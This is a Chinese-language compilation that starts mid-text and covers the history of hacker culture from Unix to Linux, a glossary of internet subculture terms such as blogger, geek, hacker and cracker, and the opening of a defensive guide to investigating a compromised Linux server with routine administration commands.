※译：Ken Thompson与Dennis Ritchie是唯一两位获得Turing Award(电脑界的诺贝尔奖)的工程师(其他都是学者)。

这当时是一件不可思议的事！它意味著，如果Unix可以在各种平台上跑的话，Unix 软件就能移植到各种机器上。再也用不著为特定的机器写软件了，能在Unix上跑最重要，重新发明轮子已经成为过去式了。

除了跨平台的优点外，Unix与C还有许多显著的优势。Unix与C的设计哲学是Keep It Simple, Stupid'。programmer可以轻易掌握整个C的逻辑结构（不像其他之前或以后的程式语言）而不用一天到晚翻手册写程式。而Unix提供许多有用的小工具程式，经过适当的组合（写成Shell script或Perl script），可以发挥强大的威力。

※注：The C Programming Language是所有程式语言书最薄的一本，只有两百多页哦。作者是Brian Kernighan 与Dennis Ritchie，所以这本C语言的圣经又称`KR'。

※注：`Keep It Simple, Stupid' 简称KISS，今日Unix已不follow这个原则，几乎所有Unix 都是要灌一堆有的没的utilities，唯一例外是MINIX。

C与Unix的应用范围之广，出乎原设计者之意料，很多领域的研究要用到电脑时，他们是最佳拍档。尽管缺乏一个正式支援的机构，它们仍在ATT内部中疯狂的散播。到了1980年，已蔓延到大学与研究机构，还有数以千计的hacker想把Unix装在家里的机器上。

当时跑Unix的主力机器是PDP-11、VAX系列的机器。不过由於UNIX的高移植性，它几乎可安装在所有的电脑机型上。一旦新型机器上的UNIX安装好，把软件的C原始码抓来重新编译就一切OK了，谁还要用汇编语言来开发软件？有一套专为UNIX设计的网络——UUCP：一种低速、不稳但成本很低廉的网络。两台UNIX机器用条电话线连起来，就可以使用互传电子邮件。UUCP是内建在UNIX系统中的，不用另外安装。於是UNIX站台连成了专属的一套网络，形成其Hacker文化。在1980第一个USENET站台成立之后，组成了一个特大号的分散式布告栏系统，吸引而来的人数很快地超过了ARPANET。

少数UNIX站台有连上ARPANET。PDP-10与UNIX的Hacker文化开始交流，不过一开始不怎么愉快就是了。PDP-10的Hacker们觉得UNIX的拥护者都是些什么也不懂的新手，比起他们那复杂华丽，令人爱不释手的LISP与ITS，C与UNIX简直原始的令人好笑。『一群穿兽皮拿石斧的野蛮人』他们咕哝著。

在这当时，又有另一股新潮流风行起来。第一部PC出现在1975年；苹果电脑在1977年成立，以飞快的速度成长。微电脑的潜力，立刻吸引了另一批年轻的 Hackers。他们最爱的程式语言是BASIC，由於它过於简陋，PDP-10 的死忠派与UNIX迷们根本不屑用它，更看不起使用它的人。

※译：这群Hacker中有一位大家一定认识，他的名字叫Bill Gates，最初就是他在8080上发展BASIC compiler的。

古老时代的终结

1980年同时有三个Hacker文化在发展，尽管彼此偶有接触与交流，但还是各玩各的。ARPANET/PDP-10文化，玩的是LISP、MACRO、TOPS-10与ITS。UNIX与C的拥护者用电话线把他们的PDP-11与VAX机器串起来玩。还有另一群散乱无秩序的微电脑迷，致力於将电脑科技平民化。

三者中ITS文化（也就是以MIT AI LAB为中心的Hacker文化）可说在此时达到全盛时期，但乌云逐渐笼罩这个实验室。ITS赖以维生的PDP-10逐渐过时，开始有人离开实验室去外面开公司，将人工智慧的科技商业化。MIT AI Lab 的高手挡不住新公司的高薪挖角而纷纷出走，SAIL与CMU也遭遇到同样的问题。

※译：这个情况在GNU宣言中有详细的描述，请参阅：（特别感谢由AKA的chuhaibo翻成中文）

致命一击终於来临，1983年DEC宣布：为了要集中在PDP-11与VAX生产线，将停止生产PDP-10；ITS没搞头了，因为它无法移植到其他机器上，或说根本没人办的到。而Berkeley Univeristy修改过的UNIX在新型的VAX跑得很顺，是ITS理想的取代品。有远见的人都看得出，在快速成长的微电脑科技下，Unix一统江湖是迟早的事。

差不多在此时Steven Levy完成``Hackers'' 这本书，主要的资料来源是Richard M. Stallman(RMS)的故事，他是MIT AI Lab领袖人物，坚决反对实验室的研究成果商业化。

Stallman接著创办了Free Software Foundation，全力投入写出高品质的自由软件。Levy以哀悼的笔调描述他是the last true hacker'，还好事实证明Levy完全错了。

※译：Richard M. Stallman的相关事迹请参考:

Stallman的宏大计划可说是80年代早期Hacker文化的缩影——在1982年他开始建构一个与UNIX 相容但全新的操作系统，以C来写并完全免费。整个ITS的精神与传统，经由RMS的努力，被整合在一个新的，UNIX与VAX机器上的Hacker文化。微电脑与区域网络的科技，开始对Hacker文化产生影响。Motorola 68000 CPU 加Ethernet是个有力的组合，也有几家公司相继成立生产第一代的工作站。1982年，一群Berkeley出来的UNIX Hacker成立了Sun Microsystems，他们的算盘打的是：把UNIX架在以68000为CPU的机器，物美价廉又符合多数应用程式的要求。他们的高瞻远嘱为整个工业界树立了新的里程碑。虽然对个人而言，工作站仍太昂贵，不过在公司与学校眼中，工作站真是比迷你电脑便宜太多了。在这些机构里，工作站（几乎是一人一台）很快地取代了老旧庞大的VAX等timesharing机器。

※译：Sun一开始生产的工作站CPU是用Motorola 68000系列，到1989才推出自行研发的以SPARC系列为CPU的SPARCstation。

私有Unix时代

1984年ATT解散了，UNIX正式成为一个商品。当时的Hacker文化分成两大类，一类集中在Internet与USENET上（主要是跑UNIX的迷你电脑或工作站连上网络），以及另一类PC迷，他们绝大多数没有连上Internet。

※译：台湾在1992年左右连上Internet前，玩家们主要以电话拨接BBS交换资讯，但是有区域性的限制，发展性也大不如USENET。Sun与其他厂商制造的工作站为Hacker们开启了另一个美丽新世界。工作站诉求的是高效能的绘图与网络，1980年代Hacker们致力为工作站撰写软件，不断挑战及突破以求将这些功能发挥到百分之一百零一。Berkeley发展出一套内建支援ARPANET protocols的UNIX，让UNIX能轻松连上网络，Internet也成长的更加迅速。

除了Berkeley让UNIX网络功能大幅提升外，尝试为工作站开发一套图形界面也不少。最有名的要算MIT开发的Xwindow了。Xwindow成功的关键在完全公开原始码，展现出Hacker一贯作风，并散播到Internet上。X 成功的干掉其他商业化的图形界面的例子，对数年后UNIX的发展有著深远的启发与影响。少数ITS死忠派仍在顽抗著，到1990年最后一台ITS也永远关机长眠了；那些死忠派在穷途末路下只有悻悻地投向UNIX的怀抱。

UNIX们此时也分裂为BerkeleyUNIX与ATT两大阵营，也许你看过一些当时的海报，上面画著一台钛翼战机全速飞离一个爆炸中、上面印著ATT的商标的死星。Berkeley UNIX的拥护者自喻为冷酷无情的公司帝国的反抗军。就销售量来说，ATTUNIX始终赶不上BSD/Sun，但它赢了标准制订的战争。到1990年，ATT与BSD版本已难明显区分，因为彼此都有采用对方的新发明。随著90年代的来到，工作站的地位逐渐受到新型廉价的高档PC的威胁，他们主要是用Intel80386系列CPU。第一次Hacker能买一台威力等同於十年前的迷你电脑的机器，上面跑著一个完整的UNIX，且能轻易的连上网络。沉浸在MSDOS世界的井底蛙对这些巨变仍一无所知，从早期只有少数人对微电脑有兴趣，到此时玩DOS与Mac的人数已超过所谓的"网络民族"的文化，但他们始终没成什么气候或搞出什么飞机，虽然聊有佳作光芒乍现，却没有稳定发展出统一的文化传统，术语字典，传奇故事与神话般的历史。它们没有真正的网络，只能聚在小型的BBS 站或一些失败的网络如FIDONET。提供上网服务的公司如CompuServe或Genie生意日益兴隆，事实显示non-UNIX的操作系统因为并没有内附如compiler等程式发展工具，很少有source 在网络上流传，也因此无法形成合作开发软件的风气。Hacker文化的主力，是散布在Internet各地，几乎可说是玩UNIX的文化。他们玩电脑才不在乎什么售后服务之类，他们要的是更好的工具、更多的上网时间、还有一台便宜32-bitPC。

机器有了，可以上网了，但软件去哪找？商业的UNIX贵的要命，一套要好几千大洋($)。90年代早期，开始有公司将ATT与BSDUNIX移植到PC上出售。成功与否不论，价格并没有降下来，更要紧的是没有附原始码，你根本不能也不准修改它，以符合自己的需要或拿去分享给别人。传统的商业软件并没有给Hacker们真正想要的。

即使是FreeSoftwareFoundation(FSF)也没有写出Hacker想要的操作系统，RMS承诺的GNU操作系统——HURD 说了好久了，到1996年都没看到影子(虽然1990年开始，FSF的软件已经可以在所有的UNIX平台执行)。

早期的免费Unix

在这空窗期中，1992年一位芬兰HelsinkiUniversity的学生--LinusTorvalds开始在一台386PC上发展一个自由软件的UNIX kernel，使用FSF的程式开发工具。

他很快的写好简单的版本，丢到网络上分享给大家，吸引了非常多的Hacker来帮忙一起发展Linux-一个功能完整的UNIX，完全免费且附上全部的原始码。Linux最大的特色，不是功能上的先进而是全新的软件开发模式。直到Linux的成功前，人人都认为像操作系统这么复杂的软件，非得要靠一个开发团队密切合作，互相协调与分工才有可能写的出来。商业软件公司与80年代的FreeSoftwareFoundation所采用都是这种发展模式。

Linux则迥异于前者。一开始它就是一大群Hacker在网络上一起涂涂抹抹出来的。没有严格品质控制与高层决策发展方针，靠的是每周发表新版供大家下载测试，测试者再把bug与patch贴到网络上改进下一版。一种全新的物竞天择、去芜存菁的快速发展模式。令大伙傻眼的是，东修西改出来的Linux，跑的顺极了。

1993年底，Linux发展趋於成熟稳定，能与商业的UNIX一分高下，渐渐有商业应用软件移植到Linux上。不过小型UNIX厂商也因为Linux的出现而关门大吉——因为再没有人要买他们的东西。幸存者都是靠提供BSD为基础的UNIX 的完整原始码，有Hacker加入发展才能继续生存。

Hacker文化，一次次被人预测即将毁灭，却在商业软件充斥的世界中，披荆斩棘，筚路蓝缕，开创出另一番自己的天地。

网络大爆炸时代

Linux能快速成长的来自令一个事实：Internet大受欢迎，90年代早期ISP如雨后春笋般的冒出来，World-Wide-Web的出现，使得Internet成长的速度，快到有令人窒息的感觉。

BSD专案在1994正式宣布结束，Hacker们用的主要是免费的UNIX(Linux与一些4.4BSD的衍生版本)。而LinuxCD-ROM销路非常好(好到像卖煎饼般)。近几年来Hacker们主要活跃在Linux与Internet发展上。World-Wide-Web让Internet成为世界最大的传输媒体，很多80年代与90年代早期的Hacker们现在都在经营ISP。

Internet的盛行，Hacker文化受到重视并发挥其政治影响力。94、95年美国政府打算把一些较安全、难解的编码学加以监控，不容许外流与使用。这个称为Clipper proposal的专案引起了Hacker们的群起反对与强烈抗议而半途夭折。96年Hacker又发起了另一项抗议运动对付那取名不当的"Communications DecencyAct"，誓言维护Internet上的言论自由。

电脑与Internet在21世纪将是大家不可或缺的生活用品，现代孩子在使用Internet科技迟早会接触到Hacker文化。它的故事传奇与哲学，将吸引更多人投入。未来对Hacker们是充满光明的。

除了黑客、博客还有什么客？都是什么意思？

网络”X客”大集合：博客、维客、奇客、播客、闪客、摩客、…

随着互联网越来越普及，网络文化也开始走向了多样化、个性化，并逐渐影响到现实生活，并成为社会文化的一个重要组成部分，而网络人群也随着网络文化的延伸发展划分了多个特色群体，这里主要介绍“X客”群体，它包括了博客、维客、奇客、播客、闪客、摩客、黑客、红客、骇客、飞客、数字朋克、威客、秀客、拍客、搜客、游客等群体。你是哪种X客呢？或者对哪类X客感兴趣呢？就来看看以下的介绍吧：

博客：原名weblog，后简化为blog，台湾译为部落格，也有直译为网志的。公认是由Peter Merholz在1999年命名而成，blog简单说就是一个个人信息发布系统，文章按时间倒序排列，文章内容以超链接作为重要的表达方式，频繁更新。它同日记不同的是，它是一个面向公众的个人媒体，它使得个人有了更多的机会面向大众，发表自己的观点和看法。随着技术的不断发展，blog还延伸发展了移动博客（Moblog）、图片博客（Fotolog）、群体博客（Group blog）等多种形式。

维客：原名wiki，通常译为维基，来源于夏威夷语的“wee kee wee kee”，中文为“快点快点”的意思。wiki的概念始于1995年，当时在PUCC（Purdue University Computing Center）工作的沃德·坎宁安（Ward Cunningham）建立了一个叫波特兰模式知识库（Portland Pattern Repository）的工具，其目的是方便社群的交流，他也因此提出了wiki这一概念。Wiki 系统创造者的 Ward Cunningham，共同为 Wiki 下了定义：一群相互连接并可自由扩展的网页、一套用来储存与修改信息的超文本系统，所有的网页储存在一套数据库中，任何人透过具有表单功能的浏览器用户程序，皆可轻易加以编辑。wiki最大的特色就是协同创作、版本控制以及独有的语法规则。wiki通常用于知识管理系统、百科全书、使用手册等，目前最大的wiki系统是2001年开始运行的Wikimedia百科全书系统，可惜在国内被封，无法访问。

奇客：原名“Geek”，也有叫极客的。Geek也称原指那些性格古怪的人，或是在狂欢节进行奇怪表演的小丑。在PC革命初期，“奇客”开始衍伸为一般人对电脑黑客的贬称，他们具有极高的技术能力、对计算机与网络的痴迷有时会达到不正常状态，将自己生活的大部份精力和时间都消耗在电脑和网络上。给大众普遍的印象是：架着厚厚圈圈眼境、头发凌乱或发型古怪、衣着老土古怪，性格偏执离群等。中文最接近的说法就是“发烧友”，但是比发烧友更富内涵……最近Geek的概念更加大众化，Geek通常指一些在业余时间沉迷在电脑网络上与人交往的人。不过我更认同Geek是电脑网络的狂热爱好者，但并不一定是电脑高手。其他比较认可的解释：ComputerGeek from The Jargon-The NewHacker’s Dictionary、ComputerGeek from FOLDOC、What is a geek? by omini。

典型网站：slashdot.org（英文）、solidot.org（中文）

播客：原名Podcast或Podcasting，这个词是苹果电脑的”iPod”与”广播”(broadcast)构成的合成词，简单的说就是个人的网络广播。Podcast是数字广播技术的一种，初期借助一个叫iPodder的软件与一些便携播放器相结合而实现。播客录制的是网络广播或类似的网络声讯节目，网友可将网上的广播节目下载到自己的iPod、MP3播放器中随身收听，不必端坐电脑前，也不必实时收听，享受随时随地的自由。更有意义的是，你还可以自己制作音频节目，并将其上传到网上与他人分享。播客颠覆了被动收听广播的方式，使听众成为主动参与者。播客于2004年下半年开始流行，如今发展迅速，而且也扩展到视频节目的录制。

典型网站－国外：Podcast、odeo、last.fm，国内：土豆、菠萝网

闪客：国产词，来源于Flash，Flash的中文正有“闪”的意思，同时也对应传统静态图片有闪亮动人的意思，因此制作flash的高手就被称为闪客。其实“闪客”这个词源于“闪客帝国”个人网站。1999年正要开始建设，但是名字还没有想好。在回声资讯的“Flash论坛”上，有一天有人无意中说出一“闪客”，这个立刻击中了边城浪子。于是，“闪客”就开始挂在他的嘴边，等到“闪客帝国”开通的时候，“闪客”概念已经深入人心了。

摩客：原名Flash mobs，音译为摩客，也称作快闪暴走族。这个词来源于两个词：一个是Flash crowd，指一群人为一个目的，同时进入一个网站；另一个是Smart mob，指一群有相同见解的人，利用先进科技，例如：互联网、手机等，在无领袖下组织集会。快闪暴走族源于2003年5月的美国纽约的曼哈顿。人们仅仅知道它最初的组织者名叫比尔(Bill),他自诩是一名”社会工作者”。比尔为组织活动专门成立了一个叫“Mob Project(快闪计划)”小组。“快闪计划”自身有着鲜明的特点–参加者应当了解一些人已接受了邀请。没有网站会对活动提供专门的信息，更不会在任何当地报纸上发布任何广告–他们只是通过电子邮件的形式相互进行邀请，同为虚拟世界的朋友，几乎没有人在现实生活中会相互熟知。从2003年5月开始，这股无厘头式的“快闪暴走族”(flash mobs)风潮从纽约开始，迅速横扫世界各大都市。纽约、伦敦、阿姆斯特丹、柏林、奥斯陆、堪萨斯城、西雅图到亚洲的新加坡、香港、台北，那些原本躲藏在电脑背后互不相识的年轻男女，瞬间聚集在一起兴致勃勃地到麦当劳跳芭蕾舞、到家俱店里坐沙发、在购物中心忽然鼓掌起哄……，然后又迅速散去。来如风，去如雨，令旁观者一头雾水，完全摸不着头脑。目前我对这个最感兴趣，可是国内似乎缺乏爱好者和相应的环境。

黑客：原名Hacker，意为“劈，砍”，引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中，“黑客”则有“恶作剧”之意，尤指手法巧妙、技术高明的恶作剧。黑客具有高超的编程技术，强烈的解决问题和克服限制的欲望。黑客大都是程序员，他们对于操作系统和编程语言有着深刻的认识，乐于探索操作系统的奥秘且善于通过探索了解系统中的漏洞及其原因所在，他们遵守这样一条准则：”Never damage any system”（永不破坏任何系统）。他们近乎疯狂的钻研更深的电脑系统知识并乐于与他人共享成果，他们一度是电脑发展史上的英雄，为推动计算机的发展起了重要的作用。但是到了后来，出现了一群新的电脑高手，他们以****和进入别人的系统作为目的，被人们称作”cracker”。渐渐的，大家都混淆了这两个词的含义，而中文在翻译时，把两者都译成了黑客（有点邪恶），于是大家将错就错，就将在网络上利用任何技术危害他人的人称为”黑客”，包括一些利用别人做好的现成工具来攻击和进入他人系统的人，虽然真正的黑客绝对看不起这些玩工具的”小黑客”。

骇客：原名cracker。有些黑客逾越尺度，运用自己的知识和技能去做出有损他人权益的事情，我们就称这种人为骇客（Cracker）。骇客通常利用网络漏洞破坏网络，他们往往做一些重复的工作（如用暴力法****口令），他们也具备广泛的电脑知识，但与黑客不同的是他们以破坏为目的。

红客：redhacker，国产词，是指比较爱国的黑客一族。2001年5月那场轰动全球的中美黑客大战，而当时中国一方的“主力军”就是名噪一时的红客。红客是一种精神，它是一种热爱祖国、坚持正义、开拓进取的精神。所以只要具备这种精神并热爱着计算机技术的都可称为红客。红客通常会利用自己掌握的技术去维护国内网络的安全，并对外来的进攻进行还击。

飞客：又称电话飞客，英文名为Phreaking。是一群采用最古老的网络入侵技术盗用电话线路的人。他们是现今电脑黑客心目中病毒入侵的始祖。在他们的定义中，飞客就是对贝尔（Bell）电话系统的运作比贝尔公司的职员还清楚的电话爱好者。如今飞客依然存在，但飞客的叫法却很少提及了。

数字朋克： 也称电脑朋克，原名为Cyberpunk。首先了解一下朋克的来源，70年代末，一代青年崛起了，他们不满现实，意图反抗。但他们不再试图推翻什么、建立什么，而是寻求个体的独立、嘲弄统治者、嘲弄整个制度。于是摇滚乐诞生了一个新的流派――朋克(Punk)。到了70年代末期，新的作家群体也出现了，他们和摇滚乐的回归有极为相似的背景和动机。这些作家把目光投向60、70年代发展起来的一系列新科学：控制论、信息论、计算机/网络、生物工程等等，形成了独特的科幻文学流派数字朋克。Cyberpunk一词最早出现在布鲁斯•贝斯克1983年11月发表于科幻杂志《Amazing》上的短篇小说《Cyberpunk》。直到1984年12月30日，《阿西莫夫科幻小说杂志》的编辑加德纳•多佐伊斯在《华盛顿邮报》上发表了回顾性的文章《新的热点作家》，才将这一类作品称为“Cyberpunk”。一般认为，Cyberpunk一词由表示“控制论(Cybernetics)”的Cyber与表示摇滚乐流派的Punk组合而成。这个词覆盖的范围不仅在于计算机领域，还包括控制论、信息论和生物工程等，统称为数字朋克。黑客帝国就是典型数字朋克的代表。

在数字朋克作家看来，总存在一个系统在统治民众的生活，这种系统总是依靠某种特定的技术来实现统治，如通过洗脑、假肢、克隆、遗传工程等方式，这种技术会扩展人机合体。人成为机器的一部分，这便是Cyber的含义。在任何文化体系中，总有一些人生活在社会边缘。如罪犯、流浪汉、梦想家或只是单纯寻求兴趣爱好的人。数字朋克作品关注这些人，通常显示他们是如何把系统的那种统治技术变成他们自己的工具，这便是Punk的含义。这提醒我们，在关注数字朋克中计算机/网络的内容时，不能忘记这些作品中具有“Punk”精神的一面。这不是计算机领域的英雄史诗，这是平民的、个人主义的、玩世不恭的个人体验。

随着时间的演变，电脑朋客通常指那些着迷于电脑的反文化分子。他们喜欢在电脑上制造小型，有时则是大型的恶作剧，借此锻炼自己的对抗技能，以示对流行秩序的反抗。一些黑客喜欢把自己叫做“电脑朋克”，但像“黑客”本身一样，“电脑朋客”今天也越来越多地被等同于电脑罪犯了（注意：从中文意义上来讲电脑朋克和数字朋克实际上是有区别的，通常电脑朋克是指电脑犯罪，数字朋克指的是一种文化，多用于科幻作品中）。

威客：最近涌现的一个词语，意思指能够让智慧体现价值的人，英文名取为witkey（wit智慧 key钥匙）。简单的说，威客就是“我帮人人，人人帮我”，只不过这个“帮助”分为有偿的和无偿的两种类型。威客网站就是给大家一个平台，让大家公开自己的知识、经验、能力，让需要帮助的人了解到你及你可以提供的服务和帮助，同时也可以帮你找到能够帮助自己解决问题和麻烦的人，并获得他的帮助。 代表网站：新浪的爱问，百度的知道、小i、ideacool、时间财富网、yahoo的answers

秀客：指网页设计者，通过web页面来展示自己的人。

拍客：指通过手机、数码相机的拍摄来展现和制作网志的人。

代表网站：ZCOM拍客、Fzone

搜客：习惯使用网络搜寻各类信息、资讯、知识的人。

游客：论坛上没有登陆的人。

测客是什么？

互联网创造了越来越多的新词汇，比如博客，播客，闪客，黑客，红客......等等。2006年四月底，互联网上又突然出现了测客一词，测客同博客，播客，闪客，黑客，红客等一样，都是指有某些兴趣爱好或从事互联网相关工作的一群时尚的年轻一代。测客同博客更加的类似，博客习惯于在网上写日记，让朋友们来看来了解他/她，而测客喜欢在网上出一些题目，来测试朋友和身边的人，来了解朋友。简单而言，测客就是一类人，这些人喜欢在网上出题来考大家。

测客网站在哪里？

2006年四月底， 测客e族(test.egoov.com)网站正式推出，这个目前功能最为强大的自助式测试系统一下子就带来了互联网上测客的革命，受到广大测客的一致推崇，流量直线飙升,有越来越多的网友加入测客e族，体验着互联网带来的新奇和乐趣。

遭受黑客攻击后怎样查询被攻击了

安全总是相对的，再安全的服务器也有可能遭受到攻击。作为一个安全运维人员，要把握的原则是：尽量做好系统安全防护，修复所有已知的危险行为，同时，在系统遭受攻击后能够迅速有效地处理攻击行为，最大限度地降低攻击对系统产生的影响。

一、处理服务器遭受攻击的一般思路

系统遭受攻击并不可怕，可怕的是面对攻击束手无策，下面就详细介绍下在服务器遭受攻击后的一般处理思路。

1.切断网络

所有的攻击都来自于网络，因此，在得知系统正遭受黑客的攻击后，首先要做的就是断开服务器的网络连接，这样除了能切断攻击源之外，也能保护服务器所在网络的其他主机。

2.查找攻击源

可以通过分析系统日志或登录日志文件，查看可疑信息，同时也要查看系统都打开了哪些端口，运行哪些进程，并通过这些进程分析哪些是可疑的程序。这个过程要根据经验和综合判断能力进行追查和分析。下面的章节会详细介绍这个过程的处理思路。

3.分析入侵原因和途径

既然系统遭到入侵，那么原因是多方面的，可能是系统漏洞，也可能是程序漏洞，一定要查清楚是哪个原因导致的，并且还要查清楚遭到攻击的途径，找到攻击源，因为只有知道了遭受攻击的原因和途径，才能删除攻击源同时进行漏洞的修复。

4.备份用户数据

在服务器遭受攻击后，需要立刻备份服务器上的用户数据，同时也要查看这些数据中是否隐藏着攻击源。如果攻击源在用户数据中，一定要彻底删除，然后将用户数据备份到一个安全的地方。

5.重新安装系统

永远不要认为自己能彻底清除攻击源，因为没有人能比黑客更了解攻击程序，在服务器遭到攻击后，最安全也最简单的方法就是重新安装系统，因为大部分攻击程序都会依附在系统文件或者内核中，所以重新安装系统才能彻底清除攻击源。

6.修复程序或系统漏洞

在发现系统漏洞或者应用程序漏洞后，首先要做的就是修复系统漏洞或者更改程序bug，因为只有将程序的漏洞修复完毕才能正式在服务器上运行。

7.恢复数据和连接网络

将备份的数据重新复制到新安装的服务器上，然后开启服务，最后将服务器开启网络连接，对外提供服务。

二、检查并锁定可疑用户

当发现服务器遭受攻击后，首先要切断网络连接，但是在有些情况下，比如无法马上切断网络连接时，就必须登录系统查看是否有可疑用户，如果有可疑用户登录了系统，那么需要马上将这个用户锁定，然后中断此用户的远程连接。

1.登录系统查看可疑用户

通过root用户登录，然后执行“w”命令即可列出所有登录过系统的用户，如下图所示。

通过这个输出可以检查是否有可疑或者不熟悉的用户登录，同时还可以根据用户名以及用户登录的源地址和它们正在运行的进程来判断他们是否为非法用户。

2.锁定可疑用户

一旦发现可疑用户，就要马上将其锁定，例如上面执行“w”命令后发现nobody用户应该是个可疑用户（因为nobody默认情况下是没有登录权限的），于是首先锁定此用户，执行如下操作：

[root@server ~]# passwd -l nobody锁定之后，有可能此用户还处于登录状态，于是还要将此用户踢下线，根据上面“w”命令的输出，即可获得此用户登录进行的pid值，操作如下：

[root@server ~]# ps -ef|grep @pts/3 531 6051 6049 0 19:23 ? 00:00:00 sshd: nobody@pts/3 [root@server ~]# kill -9 6051这样就将可疑用户nobody从线上踢下去了。如果此用户再次试图登录它已经无法登录了。

3.通过last命令查看用户登录事件

last命令记录着所有用户登录系统的日志，可以用来查找非授权用户的登录事件，而last命令的输出结果来源于/var/log/wtmp文件，稍有经验的入侵者都会删掉/var/log/wtmp以清除自己行踪，但是还是会露出蛛丝马迹在此文件中的。

三、查看系统日志

查看系统日志是查找攻击源最好的方法，可查的系统日志有/var/log/messages、/var/log/secure等，这两个日志文件可以记录软件的运行状态以及远程用户的登录状态，还可以查看每个用户目录下的.bash_history文件，特别是/root目录下的.bash_history文件，这个文件中记录着用户执行的所有历史命令。

四、检查并关闭系统可疑进程

检查可疑进程的命令很多，例如ps、top等，但是有时候只知道进程的名称无法得知路径